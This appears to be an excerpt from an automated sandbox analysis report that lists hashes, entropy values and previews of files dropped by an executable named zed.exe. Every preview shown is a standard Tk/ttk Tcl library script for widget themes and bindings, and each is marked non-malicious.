                                                                                                                                                                                                                                            Size (bytes):4809
                                                                                                                                                                                                                                            Entropy (8bit):4.905115353394083
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:KrS4se/XhW03cC7TxPp/uo1ZUb0WZvSoetCgV+tMWG3xT3xgNB4x76FAuoxVYuIJ:oS4sSjWwFAGkhiP3xT3xL6B2bbe
                                                                                                                                                                                                                                            MD5:2B20E7B2E6BDDBEB14F5F63BF38DBF24
                                                                                                                                                                                                                                            SHA1:43DB48094C4BD7DE3B76AFBC051D887FEFE9887E
                                                                                                                                                                                                                                            SHA-256:CFFC59931FDD1683AD23895E92522CF49B099128753FCDFF34374024E42CF995
                                                                                                                                                                                                                                            SHA-512:1EB5EA78D26D18EAD6563AFBF1798F71723001DCC945E7DB3E4368564D0563029BE3565876AD8CB97331CFE34B2A0A313FA1BF252B87049160FE5DCD65434775
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:#..# "Clam" theme...#..# Inspired by the XFCE family of Gnome themes...#....namespace eval ttk::theme::clam {.. variable colors.. array set colors {...-disabledfg.."#999999"...-frame .."#dcdad5"...-window .."#ffffff"...-dark..."#cfcdc8"...-darker .."#bab5ab"...-darkest.."#9e9a91"...-lighter.."#eeebe7"...-lightest .."#ffffff"...-selectbg.."#4a6984"...-selectfg.."#ffffff"...-altindicator.."#5895bc"...-disabledaltindicator."#a0a0a0".. }.... ttk::style theme settings clam {.....ttk::style configure "." \... -background $colors(-frame) \... -foreground black \... -bordercolor $colors(-darkest) \... -darkcolor $colors(-dark) \... -lightcolor $colors(-lighter) \... -troughcolor $colors(-darker) \... -selectbackground $colors(-selectbg) \... -selectforeground $colors(-selectfg) \... -selectborderwidth 0 \... -font TkDefaultFont \... ;.....ttk::style map "." \... -background [list disabled $colors(-frame) \..... active $colors(-lighter)] \..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):3864
                                                                                                                                                                                                                                            Entropy (8bit):4.935603001745302
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:zcJZjdWs+WVB4ULsMF7tnvnuSuqo5DKxiFgG0FgGHx9FrGTtu/3Kt+iW2PbuAk38:zcJZEstB4UoituSm+VtYErY
                                                                                                                                                                                                                                            MD5:0205663142775F4EF2EB104661D30979
                                                                                                                                                                                                                                            SHA1:452A0D613288A1CC8A1181C3CC1167E02AA69A73
                                                                                                                                                                                                                                            SHA-256:424BBA4FB6836FEEBE34F6C176ED666DCE51D2FBA9A8D7AA756ABCBBAD3FC1E3
                                                                                                                                                                                                                                            SHA-512:FB4D212A73A6F5A8D2774F43D310328B029B52B35BEE133584D8326363B385AB7AA4AE25E98126324CC716962888321E0006E5F6EF8563919A1D719019B2D117
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:#..# "classic" Tk theme...#..# Implements Tk's traditional Motif-like look and feel...#....namespace eval ttk::theme::classic {.... variable colors; array set colors {...-frame.."#d9d9d9"...-window.."#ffffff"...-activebg."#ececec"...-troughbg."#c3c3c3"...-selectbg."#c3c3c3"...-selectfg."#000000"...-disabledfg."#a3a3a3"...-indicator."#b03060"...-altindicator."#b05e5e".. }.... ttk::style theme settings classic {...ttk::style configure "." \... -font..TkDefaultFont \... -background..$colors(-frame) \... -foreground..black \... -selectbackground.$colors(-selectbg) \... -selectforeground.$colors(-selectfg) \... -troughcolor.$colors(-troughbg) \... -indicatorcolor.$colors(-frame) \... -highlightcolor.$colors(-frame) \... -highlightthickness.1 \... -selectborderwidth.1 \... -insertwidth.2 \... ;.....# To match pre-Xft X11 appearance, use:...#.ttk::style configure . -font {Helvetica 12 bold}.....ttk::style map "." -background \... [list disabled
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):12718
                                                                                                                                                                                                                                            Entropy (8bit):5.063548300335668
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:otLzBJ9SfinaXUBLPYXlk7fKiLH+AzIoJdJwGknmyLsxoVEQGITse8g5sarkT32e:wB5aXmLPYXmrKxLL7A
                                                                                                                                                                                                                                            MD5:F7065D345A4BFB3127C3689BF1947C30
                                                                                                                                                                                                                                            SHA1:9631C05365B0F5A36E4CA5CBA83628CCD7FCBDE1
                                                                                                                                                                                                                                            SHA-256:68EED4AF6D2EC5B3EA24B1122A704B040366CBE2F458103137479352FFA1475A
                                                                                                                                                                                                                                            SHA-512:74B99B9E326680150DD5EC7263192691BCD8A71B2A4EE7F3177DEDDD43E924A7925085C6D372731A70570F96B3924450255B2F54CA3B9C44D1160CA37E715B00
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:#..# Combobox bindings...#..# <<NOTE-WM-TRANSIENT>>:..#..#.Need to set [wm transient] just before mapping the popdown..#.instead of when it's created, in case a containing frame..#.has been reparented [#1818441]...#..#.On Windows: setting [wm transient] prevents the parent..#.toplevel from becoming inactive when the popdown is posted..#.(Tk 8.4.8+)..#..#.On X11: WM_TRANSIENT_FOR on override-redirect windows..#.may be used by compositing managers and by EWMH-aware..#.window managers (even though the older ICCCM spec says..#.it's meaningless)...#..#.On OSX: [wm transient] does utterly the wrong thing...#.Instead, we use [MacWindowStyle "help" "noActivates hideOnSuspend"]...#.The "noActivates" attribute prevents the parent toplevel..#.from deactivating when the popdown is posted, and is also..#.necessary for "help" windows to receive mouse events...#."hideOnSuspend" makes the popdown disappear (resp. reappear)..#.when the parent toplevel is deactivated (resp. reactivated)...#.(see [#18147
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):4674
                                                                                                                                                                                                                                            Entropy (8bit):4.836935825704301
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:DRYEqfLDxGmxGUetobPT6t6brv0q3O4Uxz0:DWEqTDbxdKobPqe5PUxw
                                                                                                                                                                                                                                            MD5:1A799FE3754307A5AADE98C367E2F5D7
                                                                                                                                                                                                                                            SHA1:C64BE4B77F0D298610F4EE20FCEBBAEE3C8B5F22
                                                                                                                                                                                                                                            SHA-256:5B33F32B0139663347D6CF70A5A838F8E4554E0E881E97C8478B77733162EA73
                                                                                                                                                                                                                                            SHA-512:89F367F9A59730BCDFC5ABDE0E35A10B72A1F19C68A768BA4524C938EF5C5CAF094C1BFA8FC74173F65201F6617544223C2143252A9F691EE9AAA7543315179F
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:#..# Map symbolic cursor names to platform-appropriate cursors...#..# The following cursors are defined:..#..#.standard.-- default cursor for most controls..#.""..-- inherit cursor from parent window..#.none..-- no cursor..#..#.text..-- editable widgets (entry, text)..#.link..-- hyperlinks within text..#.crosshair.-- graphic selection, fine control..#.busy..-- operation in progress..#.forbidden.-- action not allowed..#..#.hresize..-- horizontal resizing..#.vresize..-- vertical resizing..#..# Also resize cursors for each of the compass points,..# {nw,n,ne,w,e,sw,s,se}resize...#..# Platform notes:..#..# Windows doesn't distinguish resizing at the 8 compass points,..# only horizontal, vertical, and the two diagonals...#..# OSX doesn't have resize cursors for nw, ne, sw, or se corners...# We use the Tk-defined X11 fallbacks for these...#..# X11 doesn't have a "forbidden" cursor (usually a slashed circle);..# "pirate" seems to be the conventional cursor for this purpose...#..# Windows has a
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):4553
                                                                                                                                                                                                                                            Entropy (8bit):4.933885986949396
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:lNl3u3lCFUeuMGN3xbVJU+N3xbVJh3IwxkxlBqatUrtY:zl3ZUe9GN3NVC+N3NVjqntUZY
                                                                                                                                                                                                                                            MD5:FC79F42761D63172163C08F0F5C94436
                                                                                                                                                                                                                                            SHA1:AABAB4061597D0D6DC371F46D14AAA1A859096DF
                                                                                                                                                                                                                                            SHA-256:49AE8FAF169165BDDAF01D50B52943EBAB3656E9468292B7890BE143D0FCBC91
                                                                                                                                                                                                                                            SHA-512:F619834A95C9DEB93F8184BCC437D701A961C77E24A831ADBD5C145556D26986BFDA2A6ACB9E8784F8B2380E122D12AC893EB1B6ACF03098922889497E1FF9EA
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:#..# Settings for default theme...#....namespace eval ttk::theme::default {.. variable colors.. array set colors {...-frame..."#d9d9d9"...-foreground.."#000000"...-window..."#ffffff"...-text .."#000000"...-activebg.."#ececec"...-selectbg.."#4a6984"...-selectfg.."#ffffff"...-darker .."#c3c3c3"...-disabledfg.."#a3a3a3"...-indicator.."#4a6984"...-disabledindicator."#a3a3a3"...-altindicator.."#9fbdd8"...-disabledaltindicator."#c0c0c0".. }.... ttk::style theme settings default {.....ttk::style configure "." \... -borderwidth .1 \... -background .$colors(-frame) \... -foreground .$colors(-foreground) \... -troughcolor .$colors(-darker) \... -font ..TkDefaultFont \... -selectborderwidth.1 \... -selectbackground.$colors(-selectbg) \... -selectforeground.$colors(-selectfg) \... -insertwidth .1 \... -indicatordiameter.10 \... ;.....ttk::style map "." -background \... [list disabled $colors(-frame) active $colors(-activebg)]...ttk::style map "."
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):17658
                                                                                                                                                                                                                                            Entropy (8bit):5.026830367336785
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:384:sca9Jzcyzf6yzwO+v+iPT3vKof8q3YIuR13a:sT9Jzcy76wiV3YNa
                                                                                                                                                                                                                                            MD5:7FFD7A32C7F8E234763E99E3357DB624
                                                                                                                                                                                                                                            SHA1:67C67557F3A6DC8B240E85D46F6B733FEE45A013
                                                                                                                                                                                                                                            SHA-256:266553EB9EED333DD836BA96204AE008F10686F4F12C404187F1E01CAB65D246
                                                                                                                                                                                                                                            SHA-512:D18B73E44F37ED92B9FD7C1F6510285D1280EB5BC665B46996E538924E9D1CAD63337279BF92587132C3AEA497325A17CCE671EA59537B350F6D921C25346F39
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:#..# DERIVED FROM: tk/library/entry.tcl r1.22..#..# Copyright (c) 1992-1994 The Regents of the University of California...# Copyright (c) 1994-1997 Sun Microsystems, Inc...# Copyright (c) 2004, Joe English..#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....namespace eval ttk {.. namespace eval entry {...variable State.....set State(x) 0...set State(selectMode) none...set State(anchor) 0...set State(scanX) 0...set State(scanIndex) 0...set State(scanMoved) 0.....# Button-2 scan speed is (scanNum/scanDen) characters...# per pixel of mouse movement....# The standard Tk entry widget uses the equivalent of...# scanNum = 10, scanDen = average character width....# I don't know why that was chosen....#...set State(scanNum) 1...set State(scanDen) 1...set State(deadband) 3.;# #pixels for mouse-moved deadband... }..}....### Option database settings...#..option add *TEntry.cursor [ttk::cursor text] widg
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):5732
                                                                                                                                                                                                                                            Entropy (8bit):5.001928619185109
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:NzEh94ntnVU8Z/1LkAKgW22SeLMQR8hzcksejmOF4ytZm:Sh9ahV3ZWAKgWDfktm
                                                                                                                                                                                                                                            MD5:80331FCBE4C049FF1A0D0B879CB208DE
                                                                                                                                                                                                                                            SHA1:4EB3EFDFE3731BD1AE9FD52CE32B1359241F13CF
                                                                                                                                                                                                                                            SHA-256:B94C319E5A557A5665B1676D602B6495C0887C5BACF7FA5B776200112978BB7B
                                                                                                                                                                                                                                            SHA-512:A4BD2D91801C121A880225F1F3D0C4E30BF127190CF375F6F7A49EB4239A35C49C44F453D6D3610DF0D6A7B3CB15F4E79BD9C129025CC496CEB856FCC4B6DE87
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:#..# Font specifications...#..# This file, [source]d at initialization time, sets up the following..# symbolic fonts based on the current platform:..#..# TkDefaultFont.-- default for GUI items not otherwise specified..# TkTextFont.-- font for user text (entry, listbox, others)..# TkFixedFont.-- standard fixed width font..# TkHeadingFont.-- headings (column headings, etc)..# TkCaptionFont -- dialog captions (primary text in alert dialogs, etc.)..# TkTooltipFont.-- font to use for tooltip windows..# TkIconFont.-- font to use for icon captions..# TkMenuFont.-- used to use for menu items..#..# In Tk 8.5, some of these fonts may be provided by the TIP#145 implementation..# (On Windows and Mac OS X as of Oct 2007)...#..# +++ Platform notes:..#..# Windows:..#.The default system font changed from "MS Sans Serif" to "Tahoma"..# .in Windows XP/Windows 2000...#..#.MS documentation says to use "Tahoma 8" in Windows 2000/XP,..#.although many MS programs still use "MS Sans Serif 8"..#..#.Should use
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):6443
                                                                                                                                                                                                                                            Entropy (8bit):4.9213750923402735
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:toMcJQkmcE6fNuLyiCzSLSRwgppdT3kXdpK3dpKkSH2tOTjvAG:tRc6kFbcH2pyXz+zO2y
                                                                                                                                                                                                                                            MD5:F11A76FBABF35E446A1200A5A7A6730A
                                                                                                                                                                                                                                            SHA1:4CBAB3507C1EF275691C98620D2B5CEEB9043B3E
                                                                                                                                                                                                                                            SHA-256:54663FBF524CAD9D74AB1EC44B7FDDE0B87F06E5347191962C97F51F714E29BB
                                                                                                                                                                                                                                            SHA-512:95471D1519AE663EC7EB4639D847019E0C9F70DEA2B0680D81FB8BBE7CD1FF643A3DF5E06CA2CC54385BE094BDCC64AB0F1AA1652F91D16C4EF7B68CB670371E
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:#..# Bindings for Menubuttons...#..# Menubuttons have three interaction modes:..#..# Pulldown: Press menubutton, drag over menu, release to activate menu entry..# Popdown: Click menubutton to post menu..# Keyboard: <space> or accelerator key to post menu..#..# (In addition, when menu system is active, "dropdown" -- menu posts..# on mouse-over. Ttk menubuttons don't implement this)...#..# For keyboard and popdown mode, we hand off to tk_popup and let..# the built-in Tk bindings handle the rest of the interaction...#..# ON X11:..#..# Standard Tk menubuttons use a global grab on the menubutton...# This won't work for Ttk menubuttons in pulldown mode,..# since we need to process the final <ButtonRelease> event,..# and this might be delivered to the menu. So instead we..# rely on the passive grab that occurs on <Button> events,..# and transition to popdown mode when the mouse is released..# or dragged outside the menubutton...#..# ON WINDOWS:..#..# I'm not sure what the hell is going on h
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):5825
                                                                                                                                                                                                                                            Entropy (8bit):4.96378772387536
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:RErUhyi5JeUQBWdz6eP8ClR6/u6AsBmPNNiREUkheLY1EVL23sN2JJjQdD:6uyiyDQBP8q6/u6AUREUsNEVq3y2jkdD
                                                                                                                                                                                                                                            MD5:F811F3E46A4EFA73292F40D1CDDD265D
                                                                                                                                                                                                                                            SHA1:7FC70A1984555672653A0840499954B854F27920
                                                                                                                                                                                                                                            SHA-256:22264D8D138E2C0E9A950305B4F08557C5A73F054F8215C0D8CE03854042BE76
                                                                                                                                                                                                                                            SHA-512:4424B7C687EB9B1804ED3B1C685F19D4D349753B374D9046240F937785C9713E8A760ADA46CB628C15F9C7983CE4A7987691C968330478C9C1A9B74E953E40AC
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:#..# Bindings for TNotebook widget..#....namespace eval ttk::notebook {.. variable TLNotebooks ;# See enableTraversal..}....bind TNotebook <Button-1>..{ ttk::notebook::Press %W %x %y }..bind TNotebook <Right>...{ ttk::notebook::CycleTab %W 1; break }..bind TNotebook <Left>...{ ttk::notebook::CycleTab %W -1; break }..bind TNotebook <Control-Tab>..{ ttk::notebook::CycleTab %W 1; break }..bind TNotebook <Control-Shift-Tab>.{ ttk::notebook::CycleTab %W -1; break }..catch {..bind TNotebook <Control-ISO_Left_Tab>.{ ttk::notebook::CycleTab %W -1; break }..}..bind TNotebook <Destroy>..{ ttk::notebook::Cleanup %W }....# ActivateTab $nb $tab --..#.Select the specified tab and set focus...#..# Desired behavior:..#.+ take focus when reselecting the currently-selected tab;..#.+ keep focus if the notebook already has it;..#.+ otherwise set focus to the first traversable widget..#. in the newly-selected tab;..#.+ do not leave the focus in a deselected tab...#..proc ttk::notebook::ActivateTab {
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2274
                                                                                                                                                                                                                                            Entropy (8bit):4.951790637542993
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:zVAqE3ZF8b4rXzsqAOAXsmCLFeNqkFeNXez:zLeU4bzSs1M
                                                                                                                                                                                                                                            MD5:848A62BCF6ED3C16A8CFD26C43E1BC4E
                                                                                                                                                                                                                                            SHA1:6F5E3EDF62716B511CF575BE2C6C997AFA2FA1E7
                                                                                                                                                                                                                                            SHA-256:20EE6AD9D701709724292A926AF93C93784B254B48A656ECC140EF3A0FE10A11
                                                                                                                                                                                                                                            SHA-512:AE78028EAF96E5B77DEFF0CD655360DB3A8058AC98B6753D9B77D629EDFFC582999A22A7075B9F5BA83EE65DA093E2CCB0EEAA4049898910D7AF517FDE60B28E
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:#..# Bindings for ttk::panedwindow widget...#....namespace eval ttk::panedwindow {.. variable State.. array set State {...pressed 0.. .pressX.-...pressY.-...sash .-...sashPos -.. }..}....## Bindings:..#..bind TPanedwindow <Button-1> ..{ ttk::panedwindow::Press %W %x %y }..bind TPanedwindow <B1-Motion>..{ ttk::panedwindow::Drag %W %x %y }..bind TPanedwindow <ButtonRelease-1> .{ ttk::panedwindow::Release %W %x %y }....bind TPanedwindow <Motion> ..{ ttk::panedwindow::SetCursor %W %x %y }..bind TPanedwindow <Enter> ..{ ttk::panedwindow::SetCursor %W %x %y }..bind TPanedwindow <Leave> ..{ ttk::panedwindow::ResetCursor %W }..# See <<NOTE-PW-LEAVE-NOTIFYINFERIOR>>..bind TPanedwindow <<EnteredChild>>.{ ttk::panedwindow::ResetCursor %W }....## Sash movement:..#..proc ttk::panedwindow::Press {w x y} {.. variable State.... set sash [$w identify $x $y].. if {$sash eq ""} {.. .set State(pressed) 0...return.. }.. set State(pressed) .1.. set State(pressX) .$x.. set
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1138
                                                                                                                                                                                                                                            Entropy (8bit):4.763501917862434
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:nJ8v3O0NSiio0pNFVkIks0ImxlnINgDImSgGINSyWghT:JFqS/o03fkxs0Rn+gD4v+S2F
                                                                                                                                                                                                                                            MD5:DBF3BF0E8F04E9435E9561F740DFC700
                                                                                                                                                                                                                                            SHA1:C7619A05A834EFB901C57DCFEC2C9E625F42428F
                                                                                                                                                                                                                                            SHA-256:697CC0A75AE31FE9C2D85FB25DCA0AFA5D0DF9C523A2DFAD2E4A36893BE75FBA
                                                                                                                                                                                                                                            SHA-512:D3B323DFB3EAC4A78DA2381405925C131A99C6806AF6FD8041102162A44E48BF166982A4AE4AA142A14601736716F1A628D9587E292FA8E4842BE984374CC192
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:#..# Ttk widget set: progress bar utilities...#....namespace eval ttk::progressbar {.. variable Timers.;# Map: widget name -> after ID..}....# Autoincrement --..#.Periodic callback procedure for autoincrement mode..#..proc ttk::progressbar::Autoincrement {pb steptime stepsize} {.. variable Timers.... if {![winfo exists $pb]} {.. .# widget has been destroyed -- cancel timer...unset -nocomplain Timers($pb)...return.. }.... set Timers($pb) [after $steptime \.. .[list ttk::progressbar::Autoincrement $pb $steptime $stepsize] ].... $pb step $stepsize..}....# ttk::progressbar::start --..#.Start autoincrement mode. Invoked by [$pb start] widget code...#..proc ttk::progressbar::start {pb {steptime 50} {stepsize 1}} {.. variable Timers.. if {![info exists Timers($pb)]} {...Autoincrement $pb $steptime $stepsize.. }..}....# ttk::progressbar::stop --..#.Cancel autoincrement mode. Invoked by [$pb stop] widget code...#..proc ttk::progressbar::stop {pb} {.. variabl
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2787
                                                                                                                                                                                                                                            Entropy (8bit):4.795451191784129
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:IKADAzizZIcAlRqucObmn4AzyVN2AJyhAzukPNP:IHIBRqupmLSZkklP
                                                                                                                                                                                                                                            MD5:F1C33CC2D47115BBECD2E7C2FCB631A7
                                                                                                                                                                                                                                            SHA1:0123A961242ED8049B37C77C726DB8DBD94C1023
                                                                                                                                                                                                                                            SHA-256:B909ADD0B87FA8EE08FD731041907212A8A0939D37D2FF9B2F600CD67DABD4BB
                                                                                                                                                                                                                                            SHA-512:96587A8C3555DA1D810010C10C516CE5CCAB071557A3C8D9BD65C647C7D4AD0E35CBED0788F1D72BAFAC8C84C7E2703FC747F70D9C95F720745A1FC4A701C544
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# scale.tcl - Copyright (C) 2004 Pat Thoyts <patthoyts@users.sourceforge.net>..#..# Bindings for the TScale widget....namespace eval ttk::scale {.. variable State.. array set State {...dragging 0.. }..}....bind TScale <Button-1> { ttk::scale::Press %W %x %y }..bind TScale <B1-Motion> { ttk::scale::Drag %W %x %y }..bind TScale <ButtonRelease-1> { ttk::scale::Release %W %x %y }....bind TScale <Button-2> { ttk::scale::Jump %W %x %y }..bind TScale <B2-Motion> { ttk::scale::Drag %W %x %y }..bind TScale <ButtonRelease-2> { ttk::scale::Release %W %x %y }....bind TScale <Button-3> { ttk::scale::Jump %W %x %y }..bind TScale <B3-Motion> { ttk::scale::Drag %W %x %y }..bind TScale <ButtonRelease-3> { ttk::scale::Release %W %x %y }....## Keyboard navigation bindings:..#..bind TScale <<LineStart>> { %W set [%W cget -from] }..bind TScale <<LineEnd>> { %W set [%W cget -to] }....bind TScale <<PrevChar>> { ttk::scale::Increment %W -1 }..bin
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):3285
                                                                                                                                                                                                                                            Entropy (8bit):4.979174619784594
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:tyASEji8RYQ8FGD7BDos9Q1TBfvq/HKTh9lkHv8T/mAezeLEAAFULxZh4x:eIi8qFu2d11XlhfkPcczeLS4Zm
                                                                                                                                                                                                                                            MD5:3FB31A225CEC64B720B8E579582F2749
                                                                                                                                                                                                                                            SHA1:9C0151D9E2543C217CF8699FF5D4299A72E8F13C
                                                                                                                                                                                                                                            SHA-256:6EAA336B13815A7FC18BCD6B9ADF722E794DA2888D053C229044784C8C8E9DE8
                                                                                                                                                                                                                                            SHA-512:E6865655585E3D2D6839B56811F3FD86B454E8CD44E258BB1AC576AD245FF8A4D49FBB7F43458BA8A6C9DAAC8DFA923A176F0DD8A9976A11BEA09E6E2D17BF45
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:#..# Bindings for TScrollbar widget..#....namespace eval ttk::scrollbar {.. variable State.. # State(xPress).--.. # State(yPress).-- initial position of mouse at start of drag... # State(first).-- value of -first at start of drag...}....bind TScrollbar <Button-1> ..{ ttk::scrollbar::Press %W %x %y }..bind TScrollbar <B1-Motion>..{ ttk::scrollbar::Drag %W %x %y }..bind TScrollbar <ButtonRelease-1>.{ ttk::scrollbar::Release %W %x %y }....bind TScrollbar <Button-2> ..{ ttk::scrollbar::Jump %W %x %y }..bind TScrollbar <B2-Motion>..{ ttk::scrollbar::Drag %W %x %y }..bind TScrollbar <ButtonRelease-2>.{ ttk::scrollbar::Release %W %x %y }....# Redirect scrollwheel bindings to the scrollbar widget..#..# The shift-bindings scroll left/right (not up/down)..# if a widget has both possibilities..set eventList [list <MouseWheel> <Shift-MouseWheel>]..switch [tk windowingsystem] {.. aqua {.. lappend eventList <Option-MouseWheel> <Shift-Option-MouseWheel>.. }.. x11 {..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2503
                                                                                                                                                                                                                                            Entropy (8bit):4.830288003879418
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:naLvMnAqeYQWYh7FvBrrbnMCfY/aVAbAigWAuFM0PfWAX20:nWQapprPnJY/8A8iRFdPtj
                                                                                                                                                                                                                                            MD5:DD6A1737B14D3F7B2A0B4F8BE99C30AF
                                                                                                                                                                                                                                            SHA1:E6B06895317E73CD3DC78234DD74C74F3DB8C105
                                                                                                                                                                                                                                            SHA-256:E92D77B5CDCA2206376DB2129E87E3D744B3D5E31FDE6C0BBD44A494A6845CE1
                                                                                                                                                                                                                                            SHA-512:B74AE92EDD53652F8A3DB0D84C18F9CE9069805BCAB0D3C2DBB537D7C241AA2681DA69B699D88A10029798D7B5BC015682F64699BA475AE6A379EEF23B48DAAF
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:#..# Sizegrip widget bindings...#..# Dragging a sizegrip widget resizes the containing toplevel...#..# NOTE: the sizegrip widget must be in the lower right hand corner...#....switch -- [tk windowingsystem] {.. x11 -.. win32 {...option add *TSizegrip.cursor [ttk::cursor seresize] widgetDefault.. }.. aqua {.. .# Aqua sizegrips use default Arrow cursor... }..}....namespace eval ttk::sizegrip {.. variable State.. array set State {...pressed .0...pressX ..0...pressY ..0...width ..0...height ..0...widthInc.1...heightInc.1.. resizeX 1.. resizeY 1...toplevel .{}.. }..}....bind TSizegrip <Button-1> ..{ ttk::sizegrip::Press.%W %X %Y }..bind TSizegrip <B1-Motion> ..{ ttk::sizegrip::Drag .%W %X %Y }..bind TSizegrip <ButtonRelease-1> .{ ttk::sizegrip::Release %W %X %Y }....proc ttk::sizegrip::Press {W X Y} {.. variable State.... if {[$W instate disabled]} { return }.... set top [winfo toplevel $W].... # If the toplevel is not resi
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):5003
                                                                                                                                                                                                                                            Entropy (8bit):5.055050310142795
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:1qg/+yrjqA/K5ytxm1J1Ve6J1yQLUAzz/S76hrwxGGe2F:N/+yr2Gk1J1Ve6fxUAzDS76hrwxs2F
                                                                                                                                                                                                                                            MD5:9C2833FAA9248F09BC2E6AB1BA326D59
                                                                                                                                                                                                                                            SHA1:F13CF048FD706BBB1581DC80E33D1AAD910D93E8
                                                                                                                                                                                                                                            SHA-256:DF286BB59F471AA1E19DF39AF0EF7AA84DF9F04DC4A439A747DD8BA43C300150
                                                                                                                                                                                                                                            SHA-512:5FF3BE1E3D651C145950C3FC5B8C2E842211C937D1042173964383D4D59ECF5DD0EC39FF7771D029716F2D895F0B1A72591EF3BF7947FE64D4D6DB5F0B8ABFFB
                                                                                                                                                                                                                                            Malicious:false
